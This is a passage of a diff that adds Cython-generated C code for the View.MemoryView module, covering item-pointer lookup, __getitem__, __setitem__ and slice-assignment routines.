"View.MemoryView":401 + * cdef char *itemp = self.view.buf + * + * for dim, idx in enumerate(index): # <<<<<<<<<<<<<< + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + */ + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":404 + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + * return itemp # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_itemp; + goto __pyx_L0; + + /* "View.MemoryView":397 + * PyThread_free_lock(self.lock) + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: # <<<<<<<<<<<<<< + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.get_item_pointer", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_idx); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":407 + * + * + * def __getitem__(memoryview self, object index): # <<<<<<<<<<<<<< + * if index is Ellipsis: + * return self + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index); /*proto*/ +static PyObject *__pyx_memoryview___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getitem__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((PyObject *)__pyx_v_index)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index) { + PyObject *__pyx_v_have_slices = NULL; + PyObject *__pyx_v_indices = NULL; + char *__pyx_v_itemp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + char *__pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getitem__", 0); + + /* "View.MemoryView":408 + * + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: # <<<<<<<<<<<<<< + * return self + * + */ + __pyx_t_1 = (__pyx_v_index == __pyx_builtin_Ellipsis); + if (__pyx_t_1) { + + /* "View.MemoryView":409 + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: + * return self # <<<<<<<<<<<<<< + * + * have_slices, indices = _unellipsify(index, self.view.ndim) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_self); + __pyx_r = ((PyObject *)__pyx_v_self); + goto __pyx_L0; + + /* "View.MemoryView":408 + * + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: # <<<<<<<<<<<<<< + * return self + * + */ + } + + /* "View.MemoryView":411 + * return self + * + * have_slices, indices = _unellipsify(index, self.view.ndim) # <<<<<<<<<<<<<< + * + * cdef char *itemp + */ + __pyx_t_2 = _unellipsify(__pyx_v_index, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (likely(__pyx_t_2 != Py_None)) { + PyObject* sequence = __pyx_t_2; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(1, 411, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_4 = PyTuple_GET_ITEM(sequence, 1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + #else + __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } else { + __Pyx_RaiseNoneNotIterableError(); __PYX_ERR(1, 411, __pyx_L1_error) + } + __pyx_v_have_slices = __pyx_t_3; + __pyx_t_3 = 0; + __pyx_v_indices = __pyx_t_4; + __pyx_t_4 = 0; + + /* "View.MemoryView":414 + * + * cdef char *itemp + * if have_slices: # <<<<<<<<<<<<<< + * return memview_slice(self, indices) + * else: + */ + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_v_have_slices); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 414, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":415 + * cdef char *itemp + * if have_slices: + * return memview_slice(self, indices) # <<<<<<<<<<<<<< + * else: + * itemp = self.get_item_pointer(indices) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = ((PyObject *)__pyx_memview_slice(__pyx_v_self, __pyx_v_indices)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 415, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":414 + * + * cdef char *itemp + * if have_slices: # <<<<<<<<<<<<<< + * return memview_slice(self, indices) + * else: + */ + } + + /* "View.MemoryView":417 + * return memview_slice(self, indices) + * else: + * itemp = self.get_item_pointer(indices) # <<<<<<<<<<<<<< + * return self.convert_item_to_object(itemp) + * + */ + /*else*/ { + __pyx_t_5 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->get_item_pointer(__pyx_v_self, __pyx_v_indices); if (unlikely(__pyx_t_5 == ((char *)NULL))) __PYX_ERR(1, 417, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_5; + + /* "View.MemoryView":418 + * else: + * itemp = self.get_item_pointer(indices) + * return self.convert_item_to_object(itemp) # <<<<<<<<<<<<<< + * + * def __setitem__(memoryview self, object index, object value): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->convert_item_to_object(__pyx_v_self, __pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 418, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":407 + * + * + * def __getitem__(memoryview self, object index): # <<<<<<<<<<<<<< + * if index is Ellipsis: + * return self + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.memoryview.__getitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_have_slices); + __Pyx_XDECREF(__pyx_v_indices); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":420 + * return self.convert_item_to_object(itemp) + * + * def __setitem__(memoryview self, object index, object value): # <<<<<<<<<<<<<< + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" + */ + +/* Python wrapper */ +static int __pyx_memoryview___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_memoryview___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setitem__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((PyObject *)__pyx_v_index), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + PyObject *__pyx_v_have_slices = NULL; + PyObject *__pyx_v_obj = NULL; + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setitem__", 0); + __Pyx_INCREF(__pyx_v_index); + + /* "View.MemoryView":421 + * + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: # <<<<<<<<<<<<<< + * raise TypeError, "Cannot assign to read-only memoryview" + * + */ + if (unlikely(__pyx_v_self->view.readonly)) { + + /* "View.MemoryView":422 + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" # <<<<<<<<<<<<<< + * + * have_slices, index = _unellipsify(index, self.view.ndim) + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_Cannot_assign_to_read_only_memor, 0, 0); + __PYX_ERR(1, 422, __pyx_L1_error) + + /* "View.MemoryView":421 + * + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: # <<<<<<<<<<<<<< + * raise TypeError, "Cannot assign to read-only memoryview" + * + */ + } + + /* "View.MemoryView":424 + * raise TypeError, "Cannot assign to read-only memoryview" + * + * have_slices, index = _unellipsify(index, self.view.ndim) # <<<<<<<<<<<<<< + * + * if have_slices: + */ + __pyx_t_1 = _unellipsify(__pyx_v_index, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (likely(__pyx_t_1 != Py_None)) { + PyObject* sequence = __pyx_t_1; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(1, 424, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); + __Pyx_INCREF(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + #else + __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } else { + __Pyx_RaiseNoneNotIterableError(); __PYX_ERR(1, 424, __pyx_L1_error) + } + __pyx_v_have_slices = __pyx_t_2; + __pyx_t_2 = 0; + __Pyx_DECREF_SET(__pyx_v_index, __pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":426 + * have_slices, index = _unellipsify(index, self.view.ndim) + * + * if have_slices: # <<<<<<<<<<<<<< + * obj = self.is_slice(value) + * if obj: + */ + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_v_have_slices); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(1, 426, __pyx_L1_error) + if (__pyx_t_4) { + + /* "View.MemoryView":427 + * + * if have_slices: + * obj = self.is_slice(value) # <<<<<<<<<<<<<< + * if obj: + * self.setitem_slice_assignment(self[index], obj) + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->is_slice(__pyx_v_self, __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 427, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_obj = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":428 + * if have_slices: + * obj = self.is_slice(value) + * if obj: # <<<<<<<<<<<<<< + * self.setitem_slice_assignment(self[index], obj) + * else: + */ + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_v_obj); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(1, 428, __pyx_L1_error) + if (__pyx_t_4) { + + /* "View.MemoryView":429 + * obj = self.is_slice(value) + * if obj: + * self.setitem_slice_assignment(self[index], obj) # <<<<<<<<<<<<<< + * else: + * self.setitem_slice_assign_scalar(self[index], value) + */ + __pyx_t_1 = __Pyx_PyObject_GetItem(((PyObject *)__pyx_v_self), __pyx_v_index); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 429, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_slice_assignment(__pyx_v_self, __pyx_t_1, __pyx_v_obj); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 429, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "View.MemoryView":428 + * if have_slices: + * obj = self.is_slice(value) + * if obj: # <<<<<<<<<<<<<< + * self.setitem_slice_assignment(self[index], obj) + * else: + */ + goto __pyx_L5; + } + + /* "View.MemoryView":431 + * self.setitem_slice_assignment(self[index], obj) + * else: + * self.setitem_slice_assign_scalar(self[index], value) # <<<<<<<<<<<<<< + * else: + * self.setitem_indexed(index, value) + */ + /*else*/ { + __pyx_t_3 = __Pyx_PyObject_GetItem(((PyObject *)__pyx_v_self), __pyx_v_index); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 431, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (!(likely(((__pyx_t_3) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_3, __pyx_memoryview_type))))) __PYX_ERR(1, 431, __pyx_L1_error) + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_slice_assign_scalar(__pyx_v_self, ((struct __pyx_memoryview_obj *)__pyx_t_3), __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 431, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_L5:; + + /* "View.MemoryView":426 + * have_slices, index = _unellipsify(index, self.view.ndim) + * + * if have_slices: # <<<<<<<<<<<<<< + * obj = self.is_slice(value) + * if obj: + */ + goto __pyx_L4; + } + + /* "View.MemoryView":433 + * self.setitem_slice_assign_scalar(self[index], value) + * else: + * self.setitem_indexed(index, value) # <<<<<<<<<<<<<< + * + * cdef is_slice(self, obj): + */ + /*else*/ { + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_indexed(__pyx_v_self, __pyx_v_index, __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 433, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_L4:; + + /* "View.MemoryView":420 + * return self.convert_item_to_object(itemp) + * + * def __setitem__(memoryview self, object index, object value): # <<<<<<<<<<<<<< + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.__setitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_have_slices); + __Pyx_XDECREF(__pyx_v_obj); + __Pyx_XDECREF(__pyx_v_index); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":435 + * self.setitem_indexed(index, value) + * + * cdef is_slice(self, obj): # <<<<<<<<<<<<<< + * if not isinstance(obj, memoryview): + * try: + */ + +static PyObject *__pyx_memoryview_is_slice(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_slice", 0); + __Pyx_INCREF(__pyx_v_obj); + + /* "View.MemoryView":436 + * + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): # <<<<<<<<<<<<<< + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + */ + __pyx_t_1 = __Pyx_TypeCheck(__pyx_v_obj, __pyx_memoryview_type); + __pyx_t_2 = (!__pyx_t_1); + if (__pyx_t_2) { + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_3, &__pyx_t_4, &__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_5); + /*try:*/ { + + /* "View.MemoryView":438 + * if not isinstance(obj, memoryview): + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, # <<<<<<<<<<<<<< + * self.dtype_is_object) + * except TypeError: + */ + __pyx_t_6 = __Pyx_PyInt_From_int(((__pyx_v_self->flags & (~PyBUF_WRITABLE)) | PyBUF_ANY_CONTIGUOUS)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_6); + + /* "View.MemoryView":439 + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) # <<<<<<<<<<<<<< + * except TypeError: + * return None + */ + __pyx_t_7 = __Pyx_PyBool_FromLong(__pyx_v_self->dtype_is_object); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 439, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_7); + + /* "View.MemoryView":438 + * if not isinstance(obj, memoryview): + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, # <<<<<<<<<<<<<< + * self.dtype_is_object) + * except TypeError: + */ + __pyx_t_8 = PyTuple_New(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_INCREF(__pyx_v_obj); + __Pyx_GIVEREF(__pyx_v_obj); + PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_v_obj); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_8, 2, __pyx_t_7); + __pyx_t_6 = 0; + __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_8, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF_SET(__pyx_v_obj, __pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + goto __pyx_L9_try_end; + __pyx_L4_error:; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + + /* "View.MemoryView":440 + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + * except TypeError: # <<<<<<<<<<<<<< + * return None + * + */ + __pyx_t_9 = __Pyx_PyErr_ExceptionMatches(__pyx_builtin_TypeError); + if (__pyx_t_9) { + __Pyx_AddTraceback("View.MemoryView.memoryview.is_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_7, &__pyx_t_8, &__pyx_t_6) < 0) __PYX_ERR(1, 440, __pyx_L6_except_error) + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_6); + + /* "View.MemoryView":441 + * self.dtype_is_object) + * except TypeError: + * return None # <<<<<<<<<<<<<< + * + * return obj + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L7_except_return; + } + goto __pyx_L6_except_error; + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + __pyx_L6_except_error:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_XGIVEREF(__pyx_t_5); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_4, __pyx_t_5); + goto __pyx_L1_error; + __pyx_L7_except_return:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_XGIVEREF(__pyx_t_5); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_4, __pyx_t_5); + goto __pyx_L0; + __pyx_L9_try_end:; + } + + /* "View.MemoryView":436 + * + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): # <<<<<<<<<<<<<< + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + */ + } + + /* "View.MemoryView":443 + * return None + * + * return obj # <<<<<<<<<<<<<< + * + * cdef setitem_slice_assignment(self, dst, src): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_obj); + __pyx_r = __pyx_v_obj; + goto __pyx_L0; + + /* "View.MemoryView":435 + * self.setitem_indexed(index, value) + * + * cdef is_slice(self, obj): # <<<<<<<<<<<<<< + * if not isinstance(obj, memoryview): + * try: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_obj); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":445 + * return obj + * + * cdef setitem_slice_assignment(self, dst, src): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + */ + +static PyObject *__pyx_memoryview_setitem_slice_assignment(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_dst, PyObject *__pyx_v_src) { + __Pyx_memviewslice __pyx_v_dst_slice; + __Pyx_memviewslice __pyx_v_src_slice; + __Pyx_memviewslice __pyx_v_msrc; + __Pyx_memviewslice __pyx_v_mdst; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_t_3; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_slice_assignment", 0); + + /* "View.MemoryView":448 + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + * cdef __Pyx_memviewslice msrc = get_slice_from_memview(src, &src_slice)[0] # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] + * + */ + if (!(likely(((__pyx_v_src) == Py_None) || likely(__Pyx_TypeTest(__pyx_v_src, __pyx_memoryview_type))))) __PYX_ERR(1, 448, __pyx_L1_error) + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(((struct __pyx_memoryview_obj *)__pyx_v_src), (&__pyx_v_src_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 448, __pyx_L1_error) + __pyx_v_msrc = (__pyx_t_1[0]); + + /* "View.MemoryView":449 + * cdef __Pyx_memviewslice src_slice + * cdef __Pyx_memviewslice msrc = get_slice_from_memview(src, &src_slice)[0] + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] # <<<<<<<<<<<<<< + * + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + */ + if (!(likely(((__pyx_v_dst) == Py_None) || likely(__Pyx_TypeTest(__pyx_v_dst, __pyx_memoryview_type))))) __PYX_ERR(1, 449, __pyx_L1_error) + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(((struct __pyx_memoryview_obj *)__pyx_v_dst), (&__pyx_v_dst_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 449, __pyx_L1_error) + __pyx_v_mdst = (__pyx_t_1[0]); + + /* "View.MemoryView":451 + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] + * + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) # <<<<<<<<<<<<<< + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_src, __pyx_n_s_ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyInt_As_int(__pyx_t_2); if (unlikely((__pyx_t_3 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_dst, __pyx_n_s_ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyInt_As_int(__pyx_t_2); if (unlikely((__pyx_t_4 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_5 = __pyx_memoryview_copy_contents(__pyx_v_msrc, __pyx_v_mdst, __pyx_t_3, __pyx_t_4, __pyx_v_self->dtype_is_object); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 451, __pyx_L1_error) + + /* "View.MemoryView":445 + * return obj + * + * cdef setitem_slice_assignment(self, dst, src): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + 